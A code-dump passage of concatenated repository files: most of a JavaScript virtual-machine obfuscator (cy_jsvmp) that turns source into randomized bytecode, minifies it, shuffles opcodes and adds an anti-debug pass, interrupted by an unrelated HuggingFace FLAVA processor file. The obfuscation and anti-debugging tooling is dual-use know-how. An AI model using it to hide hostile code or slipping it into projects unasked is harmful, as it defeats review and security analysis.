if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(RandDataCheise(zhilDx.z1810))
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(RandDataCheise(zhilDx.z104))
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z58))
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z45))
break
case "ArrayExpression":
zhili.push(RandDataCheise(zhilDx.z105))
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z40))
}
break;
case "RegExpLiteral":
zhili.push(RandDataCheise(zhilDx.z8))
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(RandDataCheise(zhilDx.z195))
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(RandDataCheise(zhilDx.z197))
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z291))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z32))
zhili.push(RandDataCheise(zhilDx.z90))
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator.replace("=","")]]))
zhili.push(RandDataCheise(zhilDx.z90))
}else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
if (node.right.type == "AssignmentExpression"){
startgetType(node.right, variablePool, zhili)
startgetType(node.right.left, variablePool, zhili)
}else{
startgetType(node.right, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z290))
}
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(RandDataCheise(zhilDx.z47))
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z46))
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z200))
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
function startfun(node2){
    // Compile one function node into its own bytecode frame stored in
    // `changlc` under a synthetic "awcbb_yhh_fun<N>" name.
    const name = "awcbb_yhh_fun" + numberKuai
    numberKuai += 1
    const frame = {"variablePool": {}, "zhili": []}
    changlc[name] = frame
    const pool = frame["variablePool"]
    const code = frame["zhili"]
    // Declare every formal parameter and emit the (z10, pool-index) pair
    // that names it; parameters with defaults compile the default first.
    for (const param of node2.params){
        if (param.type === "AssignmentPattern"){
            pool[param.left.name] = null
            startgetType(param, pool, code)
            code.push(RandDataCheise(zhilDx.z10))
            code.push(toPool(param.left.name))
        }else{
            pool[param.name] = null
            code.push(RandDataCheise(zhilDx.z10))
            code.push(toPool(param.name))
        }
    }
    code.push(RandDataCheise(zhilDx.z2))
    startgetType(node2.body, pool, code)
    // Prepend a (z10, pool-index) pair for every variable that resolved
    // to a compiled-function name, followed by a z2-family terminator —
    // same order the original splice/pop loop produced.
    const hoisted = []
    for (const key in pool){
        if (pool[key] && pool[key].indexOf("awcbb_yhh_fun") != -1){
            hoisted.push(RandDataCheise(zhilDx.z10))
            hoisted.push(toPool(key))
        }
    }
    hoisted.push(RandDataCheise(zhilDx.z1))
    code.unshift(...hoisted)
}
function start(node2){
    // Compile the top-level program body into the root bytecode frame.
    const name = "awcbb_yhh_fun" + numberKuai
    numberKuai += 1
    const frame = {"variablePool": {}, "zhili": []}
    changlc[name] = frame
    for (const statement of node2.program.body){
        startgetType(statement, frame["variablePool"], frame["zhili"])
    }
    // Prepend a (z10, pool-index) pair for every variable that resolved
    // to a compiled-function name, then a z1-family marker — identical
    // net effect to the original splice(0,0,hb.pop()) loop.
    const hoisted = []
    for (const key in frame["variablePool"]){
        const entry = frame["variablePool"][key]
        if (entry && entry.indexOf("awcbb_yhh_fun") != -1){
            hoisted.push(RandDataCheise(zhilDx.z10))
            hoisted.push(toPool(key))
        }
    }
    hoisted.push(RandDataCheise(zhilDx.z1))
    frame["zhili"].unshift(...hoisted)
}
start(ast)
cood = ``
datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
fs.writeFileSync("./outsrc/out.js", cood + datatext, (e)=>{})
}
const tst = + new Date()
const soure = "test.js"

// Post-processing pipeline: compress the VM output, run the opcode
// shuffler, compress again, then run the anti-debug pass.
// Extracted into a function so it only starts AFTER cbbjsvmp() has
// written ./outsrc/out.js. Previously this chain started immediately at
// top level, racing the asynchronous traceur branch (offes5 === 1) and
// running even when the ES6->ES5 conversion had failed.
function runPostProcess() {
    process.exec(`uglifyjs ./outsrc/out.js --compress --mangle --output ./outsrc/out3.js`, (error, stdout, stderr) => {
        if (error) {
            console.log("压缩 ==> 失败", error);
            return;
        }
        console.log("压缩 ==> 成功");
        console.log("file is save ==> ./outsrc/out3.js");
        process.exec(`node ./tool/pswitch.js`, (error, stdout, stderr) => {
            if (error) {
                console.log("pswitch ==> 失败", error);
                return;
            }
            console.log("pswitch ==> 成功");
            console.log("file is save ==> ./outsrc/out2.js");
            process.exec(`uglifyjs ./outsrc/out2.js --mangle --output ./outsrc/out2.js`, (error, stdout, stderr) => {
                if (error) {
                    console.log("压缩 ==> 失败", error);
                    return;
                }
                console.log("压缩 ==> 成功");
                console.log("file is save ==> ./outsrc/out4.js");
                process.exec(`node ./tool/jsdebugger.js`, (error, stdout, stderr) => {
                    if (error) {
                        console.log("jsdebugger ==> 失败", error);
                        return;
                    }
                    console.log("jsdebugger ==> 成功");
                    console.log("file is save ==> ./outsrc/out4.js");
                    console.log("user time =>", +new Date() - tst);
                });
            });
        });
    });
}

if (offes5 === 1) {
    // Transpile ES6 -> ES5 first; only compile and post-process on success.
    process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
        if (!error) {
            console.log("es6 to es5 ==> 成功");
            cbbjsvmp();
            console.log("file is save ==> ./outsrc/out.js");
            runPostProcess();
        } else {
            console.log("es6 to es5 ==> 失败");
        }
    });
} else {
    cbbjsvmp();
    console.log("file is save ==> ./outsrc/out.js");
    runPostProcess();
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 6,774 | src/transformers/models/flava/processing_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Image/Text processor class for FLAVA
"""
import warnings
from typing import List, Optional, Union
from ...image_utils import ImageInput
from ...processing_utils import ProcessorMixin
from ...tokenization_utils_base import BatchEncoding, PaddingStrategy, PreTokenizedInput, TextInput, TruncationStrategy
from ...utils import TensorType
class FlavaProcessor(ProcessorMixin):
    r"""
    Constructs a FLAVA processor which wraps a FLAVA image processor and a FLAVA tokenizer into a single processor.

    [`FlavaProcessor`] offers all the functionalities of [`FlavaImageProcessor`] and [`BertTokenizerFast`]. See the
    [`~FlavaProcessor.__call__`] and [`~FlavaProcessor.decode`] for more information.

    Args:
        image_processor ([`FlavaImageProcessor`]): The image processor is a required input.
        tokenizer ([`BertTokenizerFast`]): The tokenizer is a required input.
    """

    attributes = ["image_processor", "tokenizer"]
    image_processor_class = "FlavaImageProcessor"
    tokenizer_class = ("BertTokenizer", "BertTokenizerFast")

    def __init__(self, image_processor=None, tokenizer=None, **kwargs):
        # `feature_extractor` is the deprecated alias of `image_processor`.
        # Initialize it to None so the fallback below cannot raise
        # UnboundLocalError when neither argument is supplied — the intended
        # failure in that case is the ValueError further down.
        feature_extractor = None
        if "feature_extractor" in kwargs:
            warnings.warn(
                "The `feature_extractor` argument is deprecated and will be removed in v5, use `image_processor`"
                " instead.",
                FutureWarning,
            )
            feature_extractor = kwargs.pop("feature_extractor")

        image_processor = image_processor if image_processor is not None else feature_extractor
        if image_processor is None:
            raise ValueError("You need to specify an `image_processor`.")
        if tokenizer is None:
            raise ValueError("You need to specify a `tokenizer`.")

        super().__init__(image_processor, tokenizer)
        self.current_processor = self.image_processor

    def __call__(
        self,
        images: Optional[ImageInput] = None,
        text: Optional[Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]]] = None,
        add_special_tokens: bool = True,
        padding: Union[bool, str, PaddingStrategy] = False,
        truncation: Union[bool, str, TruncationStrategy] = False,
        max_length: Optional[int] = None,
        stride: int = 0,
        pad_to_multiple_of: Optional[int] = None,
        return_image_mask: Optional[bool] = None,
        return_codebook_pixels: Optional[bool] = None,
        return_token_type_ids: Optional[bool] = None,
        return_attention_mask: Optional[bool] = None,
        return_overflowing_tokens: bool = False,
        return_special_tokens_mask: bool = False,
        return_offsets_mapping: bool = False,
        return_length: bool = False,
        verbose: bool = True,
        return_tensors: Optional[Union[str, TensorType]] = None,
        **kwargs,
    ):
        """
        This method uses [`FlavaImageProcessor.__call__`] method to prepare image(s) for the model, and
        [`BertTokenizerFast.__call__`] to prepare text for the model.

        Please refer to the docstring of the above two methods for more information.
        """
        if text is None and images is None:
            raise ValueError("You have to specify either text or images. Both cannot be none.")

        if text is not None:
            encoding = self.tokenizer(
                text=text,
                add_special_tokens=add_special_tokens,
                padding=padding,
                truncation=truncation,
                max_length=max_length,
                stride=stride,
                pad_to_multiple_of=pad_to_multiple_of,
                return_token_type_ids=return_token_type_ids,
                return_attention_mask=return_attention_mask,
                return_overflowing_tokens=return_overflowing_tokens,
                return_special_tokens_mask=return_special_tokens_mask,
                return_offsets_mapping=return_offsets_mapping,
                return_length=return_length,
                verbose=verbose,
                return_tensors=return_tensors,
                **kwargs,
            )
        if images is not None:
            image_features = self.image_processor(
                images,
                return_image_mask=return_image_mask,
                return_codebook_pixels=return_codebook_pixels,
                return_tensors=return_tensors,
                **kwargs,
            )

        # Merge image features into the text encoding when both modalities
        # were given; otherwise return whichever one was processed.
        if text is not None and images is not None:
            encoding.update(image_features)
            return encoding
        elif text is not None:
            return encoding
        else:
            return BatchEncoding(data=dict(**image_features), tensor_type=return_tensors)

    def batch_decode(self, *args, **kwargs):
        """
        This method forwards all its arguments to BertTokenizerFast's [`~PreTrainedTokenizer.batch_decode`]. Please
        refer to the docstring of this method for more information.
        """
        return self.tokenizer.batch_decode(*args, **kwargs)

    def decode(self, *args, **kwargs):
        """
        This method forwards all its arguments to BertTokenizerFast's [`~PreTrainedTokenizer.decode`]. Please refer to
        the docstring of this method for more information.
        """
        return self.tokenizer.decode(*args, **kwargs)

    @property
    def model_input_names(self):
        # Union of both components' input names, de-duplicated while
        # preserving order (dict.fromkeys keeps first occurrence).
        tokenizer_input_names = self.tokenizer.model_input_names
        image_processor_input_names = self.image_processor.model_input_names
        return list(dict.fromkeys(tokenizer_input_names + image_processor_input_names))

    @property
    def feature_extractor_class(self):
        # Deprecated alias kept for backward compatibility.
        warnings.warn(
            "`feature_extractor_class` is deprecated and will be removed in v5. Use `image_processor_class` instead.",
            FutureWarning,
        )
        return self.image_processor_class

    @property
    def feature_extractor(self):
        # Deprecated alias kept for backward compatibility.
        warnings.warn(
            "`feature_extractor` is deprecated and will be removed in v5. Use `image_processor` instead.",
            FutureWarning,
        )
        return self.image_processor
|
2833844911/cy_jsvmp | 29,993 | jiajianbian.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const {tosanyuan} = require("./tool/tosanyuan")
const {es6toes5} = require("./tool/es5toes6");
const process = require("child_process");
// Whether to transpile the input from ES6 to ES5 (via traceur) first: 1 = yes, 0 = no
offes5 = 0
// Counter used to generate unique temporary names for for-in loops
var fornum = 0
// Binary/relational operator -> opcode-id table used when emitting BinaryExpression code
var dat = {"instanceof":1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
// Same keys with "=" appended, used to recognize compound assignments ("+=", "-=", ...)
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
    datkey[i] = datkey[i]+"="
}
// zhilDx maps each opcode id ("z10", "z23", ...) to a list of candidate
// encodings; RandDataCheise picks one at random when emitting bytecode.
var dp = fs.readFileSync("./jiaquban/df.json") +''
zhilDx = JSON.parse(dp)
// Return a uniformly random element of the array `data`.
function RandDataCheise(data){
    const index = Math.floor(Math.random() * data.length)
    return data[index]
}
function cbbjsvmp(soure,outpath){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
var dataText2 = fs.readFileSync("./jiaquban/gujia.js") + '';
//es6toes5
dataText = es6toes5(dataText)
var changlc = {}
var constantPool = []
var ast = parser.parse(dataText)
// 使用插件优化代码
ast = renameCj(ast)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
zhili.push(RandDataCheise(zhilDx.z192))
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(RandDataCheise(zhilDx.z190))
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z57))
zhili.push(fbme)
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( 0))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("length"))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z240))
zhili.push(RandDataCheise(zhilDx.z25))
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z90))
startgetType(node.body,variablePool,dyyy)
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z26))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z190))
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z19))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}
break
case "LabeledStatement":
let vbvb = [];
let vbvbname = node.label.name;
startgetType(node.body, variablePool, vbvb)
for (var ff=0; ff<vbvb.length; ff++){
if (vbvb[ff] === vbvbname){
vbvb[ff] = RandDataCheise(zhilDx.z190);;
vbvb[ff+1] = vbvb.length - ff-2;
}
}
copyArrayList(zhili, vbvb)
break
case "BreakStatement":
if (node.label){
zhili.push(node.label.name)
zhili.push(undefined)
}else {
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
}
break
case "DebuggerStatement":
zhili.push(RandDataCheise(zhilDx.z194))
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(true))
}
zhili.push(RandDataCheise(zhilDx.z25))
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(RandDataCheise(zhilDx.z190))
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z25))
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(RandDataCheise(zhilDx.z190))
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z192))
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(zwdz[i]))
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(gggcbb.length))
zhili.push(RandDataCheise(zhilDx.z48))
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = RandDataCheise(zhilDx.z190);
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z51))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z252))
let bh = []
startgetType(node.right, variablePool, bh)
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(RandDataCheise(zhilDx.z10))
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.name))
zhili.push(RandDataCheise(zhilDx.z181))
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.value))
zhili.push(RandDataCheise(zhilDx.z181))
}else{
startgetType(node.property, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "BinaryExpression":
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator]]))
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(RandDataCheise(zhilDx.z44))
}else if (node.operator == "typeof"){
zhili.push(RandDataCheise(zhilDx.z49))
}else if (node.operator == "!"){
zhili.push(RandDataCheise(zhilDx.z60))
}else if (node.operator == "-"){
zhili.push(RandDataCheise(zhilDx.z50))
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z55))
}else if (node.operator == "void"){
zhili.push(RandDataCheise(zhilDx.z56))
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z150))
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.id.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(bcxh))
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "AssignmentExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(RandDataCheise(zhilDx.z1810))
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(RandDataCheise(zhilDx.z104))
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z58))
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z45))
break
case "ArrayExpression":
zhili.push(RandDataCheise(zhilDx.z105))
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z40))
}
break;
case "RegExpLiteral":
zhili.push(RandDataCheise(zhilDx.z8))
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(RandDataCheise(zhilDx.z195))
